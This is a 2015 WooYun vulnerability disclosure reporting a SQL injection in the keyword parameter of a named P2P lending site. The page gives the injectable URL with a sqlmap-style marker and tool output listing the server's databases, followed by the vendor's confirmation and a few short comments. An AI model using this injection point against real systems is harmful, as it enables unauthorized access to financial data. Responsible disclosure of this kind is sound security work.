当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127220

漏洞标题:金融服务商安全之某大型P2P平台高危SQL注入漏洞

相关厂商:anxin.com

漏洞作者: 黑暗游侠

提交时间:2015-07-16 18:01

修复时间:2015-09-04 11:12

公开时间:2015-09-04 11:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-16: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

金融服务商安全之某大型P2P平台高危SQL注入漏洞

详细说明:

安心贷(www.anxin.com)是君安信(北京)科技有限公司的独立品牌。安心贷成立于2011年,是中国较早开始运营的P2P网贷平台。
安心贷以金融从业者严谨务实的态度,逐步发展起来。安心贷是最早一批对于投资人进行风险保障的平台,并始终要求借款人用资产进行超额抵押。通过严格的风控,安心贷成为中国网贷行业违约率最低的平台之一。
安心贷拥有一支精通金融理财、互联网技术和政策法规的专业队伍。本着“高效,低调,求真,务实”的宗旨,不断提升交易安全等级和服务质量,赢得了良好的用户口碑,帮助急需融资发展的小微企业和个体工商从业者获得融资贷款, 成为国内知名品牌。
安心贷是安全、透明、稳定、高效的互联网金融平台,致力于利用互联网的便捷高效的特点,整合行业优质资源,为小微企业主和投资理财人士提供高质量的金融信息对接服务。

漏洞证明:

漏洞URL:

http://www.anxin.com/ask/askmore.aspx?keyword=*


keyword过滤不严存在注入
Result:

[01:25:17] [INFO] fetching database names
[01:25:17] [INFO] fetching number of databases
[01:25:17] [INFO] resumed: 7
[01:25:17] [INFO] resumed: AnxinExt
[01:25:17] [INFO] resumed: master
[01:25:17] [INFO] resumed: model
[01:25:17] [INFO] resumed: msdb
[01:25:17] [INFO] resumed: ReportServer
[01:25:17] [INFO] resumed: ReportServerTempDB
[01:25:17] [INFO] resumed: tempdb
available databases [7]:
[*] AnxinExt
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

修复方案:

版权声明:转载请注明来源 黑暗游侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-07-21 11:10

厂商回复:

谢谢对我们公司的安全作出贡献

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-20 19:46 | Huc-Unis ( 普通白帽子 | Rank:1055 漏洞数:292 | 诶,现在通用奖励越来越低了;离买保时捷卡...)

    看完你的漏洞,我得出一个结论:标题写的这么吓人!!注入就是高危,webshell就是内网,数据就是百万;这样很吓人的

  2. 2015-07-20 23:16 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @Huc-Unis 然并卵